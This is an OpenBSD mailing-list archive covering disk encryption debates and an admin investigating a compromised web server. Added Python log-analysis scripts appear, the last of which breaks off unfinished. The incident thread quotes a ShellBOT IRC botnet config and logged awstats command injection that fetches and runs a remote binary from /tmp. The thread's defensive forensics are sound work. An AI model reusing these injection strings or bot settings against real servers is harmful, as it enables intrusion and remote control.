Re: CGD
On 02/04/2006 01:05:17 AM, veins wrote:
> I think you are missing the point, cgd and salting are two different and unrelated things. It's not because cgd isn't making it into OpenBSD, that salting won't make it into svnd. I'd explain, but frankly after a night at work i'd rather go and sleep while you google :-)

I know cgd and salting are two different things, but cgd salts and svnd does not. IMO, what the thread is about is the criticisms that came up of svnd, compared with the goodness of CGD, in the interview about CGD. So, people are suddenly wanting CGD... Or maybe I am OT, it is late. :) The svnd salting patch did come up in the CGD thread, which sorta changed the subject to whether or not svnd _should_ salt.

> ps. tedu just said that he got no comments about his diff, if you really think the idea is valuable, you should be testing the diff.

You are right. But another point of my post was to indicate that yes, tedu is right in that most people _won't_ run CGD (or svnd) but people _still_ appreciate having the option open. I, like IMO a lot of people, have only enough interest to kibitz in the hope of slowly collecting enough information to make an informed choice should the time come to exercise the option. The only apology I make regarding this aspect of my post is for cluttering up the list in the hope that what I say will make the people actually doing the work feel appreciated rather than put-upon, by pointing out that the clueless questions are an indication of the large breadth (but not depth) of desire for a crypto fs. It seems tough working on something complex that a whole lot of people sorta think they want a little bit. Crypto fs seems to fit that bill more than most. So by way of support I thought I'd try to point this out and give encouragement. Again, sorry if it's a distraction. Regardless, thanks for hitting me with a clue-stick even if I did not need it, because sometimes I do. :-)

Karl [EMAIL PROTECTED]

Free Software: You don't pay back, you pay forward.
-- Robert A. Heinlein
Re: DadOS - sys shutdown with XDM
On Wednesday 04 January 2006 02:36, Otto Moerbeek wrote:
> On Tue, 3 Jan 2006, Dave Feustel wrote:
>> On Tuesday 03 January 2006 17:50, Otto Moerbeek wrote:
>>> On Tue, 3 Jan 2006, Dave Feustel wrote:
>>>> On Tuesday 03 January 2006 17:11, J.C. Roberts wrote:
>>>>> The rule of thumb for granting privileges is simple; avoid granting permissions whenever possible.
>>>> Check the ownership/privileges on /tmp/.X11-unix/X0 after you start kde or Xorg.
>>> Come on, this is a unix domain socket, as has been pointed out before. You keep on repeating this nonsense. Having a world writable socket is not a problem in itself. X has its own authentication/authorization scheme, which is used both for unix domain sockets and tcp sockets.
>> I confess that I do not understand the ramifications of the world rw+suid permissions on this socket. I do wonder why this socket has world rw when it seems to work equally well after I do a chmod 4700 on it at the beginning of every kde session. Do not the permissions applied to this socket violate the principle of least privilege mentioned above?
> It does not have suid permissions. This clearly shows you understand little about permissions. Hint: it's a socket, starting with an 's'. The principle is not violated, because having the socket writable for others has its uses, maybe?
>
> -Otto

Otto, I reread the man page for ls and I did indeed misread the documentation as to what the 's' means here. Thanks for pointing that out.

    50 srwxrwxrwx  1 daf  wheel  0 Jan  4 05:01 /tmp/.X11-unix/X0
    80 srwx------  1 daf  wheel  0 Jan  4 05:01 /tmp/.ICE-unix/dcop15166-1136368903
    90 srwx------  1 daf  wheel  0 Jan  4 05:01 /tmp/.ICE-unix/389

--
Lose, v., experience a loss, get rid of, lose the weight
Loose, adj., not tight, let go, free, loose clothing
Re: CGD
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
> On 1/3/06, knitti [EMAIL PROTECTED] wrote:
>> cgd gives users some choice over how to build their encrypted partition. you're able to use different ciphers. in the unlikely case of a cipher getting broken, you have the possibility to switch instantly, using a tool you know with stable code and the same way you configured it.
> this is really not that useful. why would you pick anything other than the best when setting it up?

because no one knows what the best is. blowfish appears to be the best at the moment, because it's secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish?

> and after it's setup, you can't change. the idea that once a cipher is broken you could migrate is nice, but think about it. are you equipping all your servers with double storage so that you can copy and reencrypt everything? i doubt anyone has thought more than 10 seconds about what the migration procedure would really be. a pain in the ass.

but you can plan for it.

> anyway, it's not that hard to switch ciphers in svnd. how critical is your timeframe? can you wait 24 hours to upgrade?

no one besides you (the developers) knows how quick an upgrade would be possible. 24h _is_ really fast, and a week would probably suffice too, for most people. I think this rocks, but no one knew it would be that fast.

>> you're able to change your passphrase without reencrypting your container.
> not really, or at least not any more so than with svnd.

encrypting with your passphrase (as would be the easy way with svnd) is using a weaker keyspace than encrypting with a generated key. but you are right, that would be possible with svnd too.

--knitti
Re: upgrading packages with pkg_add -u and pkg_add -r
On 1/3/06, Justin H Haynes [EMAIL PROTECTED] wrote:
> I really appreciate this work. Until it is complete, here are a few quick and dirty things I do to make the upgrade process a little easier. Probably common sense to many, but I'll share it all the same: https://justinhaynes.com/weblog/package-updates-in-openbsd-38/
>
> -Justin

This is good, but you should substitute:

    uname -a | awk '{print $3}'

for

    uname -r

and

    uname -a | awk '{print $5}'

for

    uname -m
Re: learning to code - suggestions needed
Edd Barrett wrote:
> I'm taking a university degree that teaches unix system programming in solaris in the second year.

FWIW, here we scratch the surface too... But I was glad I read the knf manpage and some code reviews on this list. The c.l.c FAQ was also a very good resource.

On a tangent, comp.risks and Bruce Schneier should be required reading for anyone who's programming. It's less expensive to learn through others' mistakes.

So I guess this tells you to expect to do some learning on your own by using these and others' resources. I no longer think I could be competent just by going to school.

--
Luis "disenchanted with school" Bruno
Re: CGD
>> this is really not that useful. why would you pick anything other than the best when setting it up?
>
> because no one knows what the best is. blowfish appears to be the best at the moment, because it's secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish?

If you really meant what you said you should let the people that write an OS make that decision for you.

And just for everyone's entertainment, when was it the last time that you saw swap being used?
How did they get here?
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386.

I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:

    ### Microsoft Search Worm - by br0k3d ###
    # From the same author of LinuxDay Worm and other variants ###

And:

    # ShellBOT
    # 0ldW0lf - [EMAIL PROTECTED]
    # - www.atrix-br.cjb.net
    # - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the like. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is:

    # IRC
    my @adms=(darkwoot, br0k3d, vipzen, Nandokabala); # admin nicks
    my @canais=(#gestapo);
    my $nick='ADOLFHITLER'; # bot nick.. if the nick is already in use it will show up with a random number at the end
    my $ircname = 'SSSA';
    chop (my $realname = `uname -a`);
    $servidor='irc.agitamanaus.net' unless $servidor; # IRC server to use if none is given as an argument
    my $porta='6667'; # IRC server port

My question is how did these files get into the machine. I have entries in the httpd error log that look like this:

    --05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
               => `/tmp/.cpanel'
    Resolving arnold.dvclub.com.hk... done.
    Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
    HTTP request sent, awaiting response...
    --05:10:57--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
               => `/tmp/.cpanel.tmp'
    Resolving arnold.dvclub.com.hk... done.
    Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out.
    Retrying.
    --05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2)
               => `/tmp/.cpanel.tmp'
    Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
    Length: 3,355 [text/plain]
    0K ... 100% 468.05 KB/s
    05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site. I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem.

As far as I can tell, there is no damage, but there are some entries like these in the error logs:

    /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
    /tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
    /tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :)

So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list.

I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
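Gaby's next step is a bulk grep of the web logs for wget. The script below is an added example, not something from the thread: it pulls the wget download starts and the failed /tmp executions out of an Apache error_log, lists the access_log requests served within two minutes of each download, and ranks the (client, script) pairs that sit next to the most downloads, which is the quickest way to find the script the command injection went through. The log lines, IPs and the dropsite.example hostname are constructed; it assumes combined-format access logs and that both logs cover one local day.

```python
#!/usr/bin/env python3
"""Tie wget traces in an Apache error_log back to the request that could have
triggered them. Added example; every log line below is constructed. Assumes wget
lines shaped like those in the post (time of day only), a combined-format access_log."""
import re
from datetime import date, datetime, timedelta

# wget's start line; the list archive rendered "=>" as "=", so accept both.
WGET_START = re.compile(
    r"--(?P<hms>\d{2}:\d{2}:\d{2})--\s+(?P<url>\S+)(?:\s+\(try:\s*\d+\))?"
    r"\s+=>?\s*`(?P<dest>[^']+)'")
# sh complaining about something in /tmp it could not run (a Linux ELF binary here).
EXEC_ATTEMPT = re.compile(r"^(?P<path>/tmp/\S+)\[\d+\]: .*(not found|syntax error)")
# Apache combined format: ip ident user [date] "METHOD path HTTP/x" status bytes ...
ACCESS = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
ACCESS_TS = "%d/%b/%Y:%H:%M:%S"   # the zone after the space is dropped
DAY = date(2006, 1, 4)            # wget prints no date, so the caller supplies one

# Constructed error_log excerpt in the shape the post shows (hostname is made up).
ERROR_LOG = """\
--05:10:47--  http://dropsite.example/phpBB2/linuxday.txt
           => `/tmp/.cpanel'
Resolving dropsite.example... done.
--05:12:13--  http://dropsite.example/phpBB2/linuxdaybot.txt (try: 2)
           => `/tmp/.cpanel.tmp'
/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
/tmp/x44423[4]: syntax error: `(' unexpected
"""
# Constructed combined-format access_log excerpt for the same day.
ACCESS_LOG = """\
10.0.0.5 - - [04/Jan/2006:05:09:58 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jan/2006:05:10:41 +0000] "GET /forum/phpBB2/viewtopic.php?t=42 HTTP/1.0" 200 2048 "-" "-"
198.51.100.7 - - [04/Jan/2006:05:12:02 +0000] "GET /forum/phpBB2/viewtopic.php?t=42 HTTP/1.0" 200 2048 "-" "-"
10.0.0.9 - - [04/Jan/2006:06:30:00 +0000] "GET /about.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

def parse_wget_events(error_log, day=DAY):
    """Every wget download start as (when, url, dest)."""
    events = []
    for m in WGET_START.finditer(error_log):
        t = datetime.strptime(m["hms"], "%H:%M:%S").time()
        events.append((datetime.combine(day, t), m["url"], m["dest"]))
    return events

def find_exec_attempts(error_log):
    """Paths under /tmp that the shell tried and failed to execute."""
    paths = set()
    for line in error_log.splitlines():
        m = EXEC_ATTEMPT.match(line)
        if m:
            paths.add(m["path"])
    return sorted(paths)

def parse_access_log(access_log):
    """Requests as dicts with a naive local timestamp, client ip, path and status."""
    hits = []
    for line in access_log.splitlines():
        m = ACCESS.match(line)
        if m:
            ts = datetime.strptime(m["ts"].split()[0], ACCESS_TS)
            hits.append({"ts": ts, "ip": m["ip"], "path": m["path"],
                         "status": int(m["status"])})
    return hits

def correlate(events, hits, window=timedelta(seconds=120)):
    """Requests served within `window` of each download start. Apache logs a
    request when it finishes, so the request carrying an injected wget may be
    logged shortly after the download begins; hence the window on both sides."""
    out = []
    for when, url, dest in events:
        near = [h for h in hits if when - window <= h["ts"] <= when + window]
        out.append({"when": when, "url": url, "dest": dest, "candidates": near})
    return out

def rank_scripts(matches):
    """Count how many downloads each (client ip, script path) sat next to; a script
    beside every fetch is the prime suspect, a busy static page in one window is noise."""
    counts = {}
    for m in matches:
        for key in {(h["ip"], h["path"].split("?")[0]) for h in m["candidates"]}:
            counts[key] = counts.get(key, 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])

def report(error_log=ERROR_LOG, access_log=ACCESS_LOG):
    events = parse_wget_events(error_log)
    matches = correlate(events, parse_access_log(access_log))
    return {"events": events, "ranked": rank_scripts(matches),
            "exec_attempts": find_exec_attempts(error_log)}

if __name__ == "__main__":
    r = report()
    for when, url, dest in r["events"]:
        print(f"{when:%H:%M:%S}  wget {url} -> {dest}")
    for (ip, path), n in r["ranked"]:
        print(f"  {n} download(s) near requests from {ip} for {path}")
    print("failed executions:", ", ".join(r["exec_attempts"]))
```

On a real box, feed report() the concatenated error logs of every vhost and the matching access logs; a vhost with no ErrorLog of its own, as Gaby notes, writes to the default error_log.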
Re: VPN packets not passing remote gateway [RESOLVED... sorta]
On Jan 4, 2006, at 9:32 AM, Håkan Olsson wrote:
> On 4 jan 2006, at 05.57, Jason Dixon wrote:
>> After some gentle persuading by Adrian Close, I dropped ipsecadm and went back to automatic key exchange with isakmpd. A quick configuration based on the east/west and all is good. Same PF configuration, no changes there except for the addition of ISAKMP traffic. Don't know what the problem was, although I'm sure it was user related.
> Your manual setup only included one SA (SPI 0x100a), and you always need at least two, as an SA is unidirectional.

I tried that too before moving over to ISAKMP. It was still behaving the same, but it was probably user error.

Thanks,

--
Jason Dixon
DixonGroup Consulting
http://www.dixongroup.net
Re: VPN packets not passing remote gateway [RESOLVED... sorta]
Jason Dixon wrote:
> On Jan 4, 2006, at 9:32 AM, Håkan Olsson wrote:
>> On 4 jan 2006, at 05.57, Jason Dixon wrote:
>>> After some gentle persuading by Adrian Close, I dropped ipsecadm and went back to automatic key exchange with isakmpd. A quick configuration based on the east/west and all is good. Same PF configuration, no changes there except for the addition of ISAKMP traffic. Don't know what the problem was, although I'm sure it was user related.
>> Your manual setup only included one SA (SPI 0x100a), and you always need at least two, as an SA is unidirectional.
> I tried that too before moving over to ISAKMP. It was still behaving the same, but it was probably user error.
>
> Thanks,
>
> --
> Jason Dixon
> DixonGroup Consulting
> http://www.dixongroup.net

Here is the most simple manual keying setup I could make: I can create a manually keyed host to host vpn with two lines in /etc/ipsec.conf. On the other host, just make sure to swap the IPs, spi numbers and the auth and enc keys. The key values are for testing only.

    flow esp from 192.168.71.129 to 192.168.71.128
    esp from 192.168.71.129 to 192.168.71.128 spi 0x1000:0x1001 authkey 0x:0x0001 enckey 0x:0x0001
Re: How did they get here?
Looks like you've made some new friends in Manaus, Brazil :-)

-p.

On Wed, Jan 04, 2006 at 02:50:01PM +, Gaby vanhegan wrote:
> To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory.
Re: CGD
On 1/4/06, Marco Peereboom [EMAIL PROTECTED] wrote:
>> because no one knows what the best is. blowfish appears to be the best at the moment, because it's secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish?
> If you really meant what you said you should let the people that write an OS make that decision for you.

apparently there is no such thing as a general best, only an application specific one. or do you suggest there is one? why would the developers then decide to use blowfish for svnd and aes for swap? as it looks, data in swap is more secure than on svnd. known plaintext attacks are far more difficult, and no problem with replay attacks. why shouldn't I be able to have this also for storage? if that's the decision by the developers, I'd rather decide on my own.

> And just for everyone's entertainment, when was it the last time that you saw swap being used?

last year. five days ago.

--knitti
Re: How did they get here?
Hi,

Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_ only from known good backup. You could use a boot cdrom to dd off an image of the disk for later analysis if you want first.

Is there some attack vector like php or such available on the machine? maybe they used that to retrieve/write the file? ... but access to /tmp is tricky from a chrooted httpd!

/Pete

On 4. jan. 2006, at 15.50, Gaby vanhegan wrote:
> To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory.
Re: How did they get here?
On Wed, 2006-01-04 at 14:50:01 +, Gaby vanhegan proclaimed...
> To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:

Is this doing any A/V scanning? You have told us nothing about the host in question: is it an email gateway? DNS server? etc.
Re: How did they get here?
On 4 Jan 2006, at 15:51, Pete Vickers wrote:
> Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_ only from known good backup. You could use a boot cdrom to dd off an image of the disk for later analysis if you want first.

It seems that the files have been uploaded, but they haven't actually caused any damage, or even been run. Unfortunately, I don't have the resources to mount a full investigation. Grep'ing every httpd log on the machine has produced no more information, but the fact that the actual wget output was in the httpd logs leads me to think that was the way in.

> Is there some attack vector like php or such available on the machine? maybe they used that to retrieve/write the file?

The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success.

> ... but access to /tmp is tricky from a chrooted httpd!

Legacy sites mean that we haven't tried to chroot apache yet. I think it's probably time to bite the bullet and get this done :)

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:05, eric wrote:
>> I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:
> Is this doing any A/V scanning? You have told us nothing about the host in question: is it an email gateway? DNS server? etc.

It runs:

- qmail/spamassassin-spamd/openbsd-spamd/rblsmtpd
- stock apache/php 4.3.8

It does no AV scanning above and beyond what SpamAssassin provides. It does not run any DNS services. I outlined my reasons why I thought it was a php/cgi script problem, being that the messages were found in the default httpd error logs.

Finally, here is a dmesg (thanks Josh :-)

    OpenBSD 3.6 (GENERIC.MP) #173: Fri Sep 17 12:52:31 MDT 2004
        [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
    cpu0: Intel Pentium III (GenuineIntel 686-class) 601 MHz
Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: learning to code - suggestions needed
Kim Onnel wrote:
> I just don't understand what ur saying

Damn, sorry about that.

- FWIW means for what (little) it's worth :-)
- knf is a manpage; actually, I think it's called style in section 9.
- c.l.c. is a usenet group; the comp.lang.c FAQ has lots of tips and tricks which I think are very useful.

And I did start with K&R; a great book. Which *also* isn't required reading; my teacher actually recommended Herb's book.

--
Luis Bruno
Re: How did they get here?
On Wed, Jan 04, 2006 at 04:07:21PM +, Gaby vanhegan wrote:
> On 4 Jan 2006, at 15:51, Pete Vickers wrote:
>> Is there some attack vector like php or such available on the machine? maybe they used that to retrieve/write the file?
> The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success.

There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector.

Joachim
Re: How did they get here?
>> To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:
> Is this doing any A/V scanning? You have told us nothing about the host in question: is it an email gateway? DNS server? etc.

I'd suspect it has something more to do with an easy-to-guess password.

--Bryan
Re: CGD
On 1/4/06, knitti [EMAIL PROTECTED] wrote:
>> this is really not that useful. why would you pick anything other than the best when setting it up?
> because no one knows what the best is. blowfish appears to be the best at the moment, because it's secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish?

aes has faster key setup, which is important for swap but not for svnd. the cvs changelog says as much. swap encryption started out using blowfish as well.
Re: How did they get here?
On Wed, Jan 04, 2006 at 05:28:38PM +0100, Joachim Schipper wrote:
> There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector.

I noticed that too. phpBB has been used for many sorts of tricks. The ISP that I work for scans for it and support follow a procedure to warn the customer that it has been disabled. (chmod)

An easy way is to change:

    AddType application/x-httpd-php .php

to:

    AddType application/x-httpd-php .phtml

Most php packages come with .php files, and people that use them usually don't have the nous to alter all the files and links throughout the package.

Craig.
Re: CGD
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
> aes has faster key setup, which is important for swap but not for svnd. the cvs changelog says as much. swap encryption started out using blowfish as well.

i also should have pointed out that swap was converted to using rijndael, not aes, since aes did not exist at the time the conversion was made.
Re: CGD
On 1/4/06, Karl O. Pinc [EMAIL PROTECTED] wrote:
another point of my post was to indicate that yes, tedu is right in that most people _won't_ run CGD (or svnd) but people _still_ appreciate having the option open. I, like IMO a lot of people, have only enough interest to kibbutz in the hope of slowly collecting enough information to make an informed choice should the time come to exercise the option.
this is a good idea. the first thing you need to do is identify your threat model. can you write it down? and if it starts with somebody stealing, you lose. amidst all the yammering, i think people are just assuming that encrypting their data makes it safe. but if you can't even say what the danger is, how can you know it's safe?
Re: biosboot broken?
Uwe Dippel wrote:
On Mon, 02 Jan 2006 14:06:52 +0100, M. Schatzl wrote:
Now that I switched to a 60G disk (cloned the other 2 partitions and the Windows bootsector, then installed OpenBSD anew from the same floppy/mirror as before), OpenBSD won't boot any more, except when I run the boot floppy and boot explicitly with wd0a:/bsd
OK, I finally found the error. This is the partition table:

Disk: wd0       geometry: 5168/240/63 [78140160 Sectors]
Offset: 0       Signature: 0xAA55
         Starting       Ending       LBA Info:
 #: id    C   H  S -    C   H  S [       start:        size ]
 0: 07    0   1  1 -  948 239 63 [          63:    14348817 ] HPFS/QNX/AUX
 1: 12 7189   0  1 - 7751 239 63 [   108697680:     8512560 ] Compaq Diag.
*2: A6  949   0  1 - 7000 239 63 [    14348880:    91506240 ] OpenBSD
 3: 00    0   0  0 -    0   0  0 [           0:           0 ] unused

This is the layout: NTFS - OpenBSD - unused - Compaq
Partitions #0 and #1 as well as the MBR were already transferred before the installation of OpenBSD (via the installer). At the disk-setup stage, I let myself drop into fdisk. Now I created the A6 partition on unused space and proceeded, the first time leaving the boot flag on #0:
^^^ The NTFS and Compaq (FAT16) partitions showed up as i and j in the disklabel editor. I had to calculate the new offsets for my partitions myself because it always remained on the initial value (which was correct for wd0a). Installing biosboot via /usr/mdec/installboot -v /boot /usr/mdec/biosboot wd0 was of exactly no use. When I set the boot flag to #2 later on, it still didn't work. The BIOS always responded with No OS found messages, though I could start OpenBSD then with a boot floppy. Apparently there was no damage done to the MBR, because Windows booted without problems.
the second time with setting the flag to #2:
There are no partitions visible except wd0a and wd0c. Offsets cumulated themselves every a X Installing the BIOS was successful and it also booted the kernel after a reboot.
In the second case it behaved as expected.
Obviously, the fact of setting the active partition affects the installation. But shouldn't the flag be just meaningful on boot, to tell the BIOS where to hook in? Maybe my assumptions/expectations are wrong, but I suspected the installer only to honor the partition ID. I don't know if this is an installer bug; I'm certainly not really hellbent to reproduce it, but I could as long as I got that old disk (1 more week). So let me know. All the best, /Markus
Re: Blowfish still good enough?
On Wednesday, January 4, Andreas Bartelt wrote: In my personal opinion, I think, the weakest link is entering the password when opening a svnd device. Are there already solutions known which combine passwords (knowledge) with hardware devices (i.e. smartcards) or biometrics in order to access some secure storage? I don't own one, but don't at least a couple of newer IBM notebook models have a fingerprint reader and a TPM built in? Do you think a combination of these measures would improve overall security? Sure, if you can get me the datasheet/etc, I'll see about possibly writing a driver for the fingerprint reader. I've contacted the company that makes them, and they refused to even talk to me. Maybe you have better luck. Otherwise, it's all talk... --Toby.
Re: How did they get here?
On 4 Jan 2006, at 16:28, Joachim Schipper wrote:
The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp.
I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success.
There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector.
That was one of the locations that the linuxday worm was being downloaded from by the wget request.
On 4 Jan 2006, at 16:35, Bryan Irvine wrote:
I'd suspect it has something more to do with an easy-to-guess password.
Even if the wget entries in the /var/www/logs/error_log correspond to the times and dates of the files in /tmp?

bash-3.00# ls -lFa /tmp
total 68
drwxrwxrwt   2 root  wheel    512 Jan  4 18:10 ./
drwxr-xr-x  22 root  wheel    512 Jun 29  2005 ../
-rw-r--r--   1 www   wheel   3355 Jan  2 04:14 .cpanel
-rw-r--r--   1 www   wheel  18695 Jan  2 04:15 .cpanel.tmp
-rw-r--r--   1 www   wheel      0 Jan  2 05:28 .plesk

Some other suspect entries are these:

61.139.83.132 - - [02/Jan/2006:07:18:12 +] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:13 +] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:15 +] GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 308

Even though we don't have awstats installed anywhere (hence the 404). There are many 404 errors for this script.

bash-3.00# locate awstats.pl
bash-3.00#

It's just a bit frustrating.
Am I right in thinking if the wget output is in /var/www/logs/error_log then it comes from a site that has no defined ErrorLog. This is a limited number of sites, but I've found no log entries from the transfer logs for those sites that correspond with the times that wget was run. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
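The log lines Gaby quotes are the kind of thing a log review should surface on its own rather than by eye. What follows is an added example, not code from the thread or from OpenBSD: a small Python pass that parses common-log-format access lines, percent-decodes each query parameter, and reports a parameter only when it carries both a command separator and a fetch-and-run cue (wget, curl, chmod, /tmp). The sample lines are constructed from the ones quoted above (timezone filled in as +0000 and the request quoted as Apache normally writes it) plus two benign requests for contrast; the pattern names and the record layout are my own.

```python
"""Detection pass over access-log lines for the awstats-style command
injection quoted in the thread. Added example, not the thread's or OpenBSD's
code; log lines are constructed from the quoted ones plus benign traffic."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: two of the requests quoted in the thread, rewritten in
# standard common-log format, plus two benign requests for contrast.
LOG_LINES = [
    '61.139.83.132 - - [02/Jan/2006:07:18:12 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300',
    '61.139.83.132 - - [02/Jan/2006:07:18:13 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300',
    '192.0.2.10 - - [02/Jan/2006:08:00:00 +0000] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [02/Jan/2006:08:00:05 +0000] "GET /search.php?q=cats|dogs HTTP/1.1" 200 812',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
SHELL_META = re.compile(r'[|;`]|\$\(')                        # command separators / substitution
FETCH_AND_RUN = re.compile(r'\b(wget|curl|chmod)\b|/tmp\b')   # fetch, make executable, stage in /tmp


def decode_query(query):
    """Split on '&' and percent-decode names and values. Splitting by hand
    avoids urllib's version-dependent treatment of ';' as a separator, which
    matters here because ';' is part of the injected payload."""
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote(name), unquote(value)))
    return params


def parse_line(line):
    """Return a dict of the log fields plus the script path and decoded
    parameters, or None when the line is not in common-log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["path"])
    rec["script"] = url.path
    rec["params"] = decode_query(url.query)
    return rec


def findings_for(rec):
    """Flag a parameter only when it carries both a command separator and a
    fetch/execute cue, so a lone '|' in a search string is not reported."""
    return [
        {"param": name, "decoded": value}
        for name, value in rec["params"]
        if SHELL_META.search(value) and FETCH_AND_RUN.search(value)
    ]


def scan(lines):
    """Return the parsed records that carry at least one finding. The HTTP
    status is kept on purpose: a 404 means the script was absent on this
    host, which is exactly why the attempts still deserve a look."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            rec["findings"] = findings_for(rec)
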